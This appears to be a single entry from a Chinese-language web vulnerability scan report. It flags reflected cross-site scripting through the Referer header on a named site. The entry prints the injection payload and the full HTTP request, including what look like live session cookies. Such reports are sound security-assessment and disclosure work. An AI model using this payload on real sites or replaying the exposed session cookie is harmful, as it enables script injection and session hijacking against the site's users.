NO.7漏洞地址 znd.dawan.cn/test.html
攻击详情 存在漏洞的位置是GET方法的referer参数
payload为"><marquee><img src=x onerror=abcd(1)></marquee><"
在返回页面中的img[onerror]标签中匹配到abcd(1),确定漏洞存在
请求 GET /test.html HTTP/1.1
Host: znd.dawan.cn
X-Schema: http
Connection: keep-alive
Accept-Encoding: gzip, deflate
Referer: http://znd.dawan.cn/exception_management.html
Cookie: Hm_lvt_085fc38faf3a4fade22b53ddde0f1e04=1688573025,1689214010,1689231711,1689863473; Hm_lvt_cd44f738169a36ff869eee3ca6afb9b1=1686189576,1687223390; Hm_lpvt_085fc38faf3a4fade22b53ddde0f1e04=1690893532; displayPwdExpiredTip=true; ASP.NET_SessionId=fyrsta0231prxignhuz2kzwm;
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
referer: "><marquee><img src=x onerror=abcd(1)></marquee><"<br......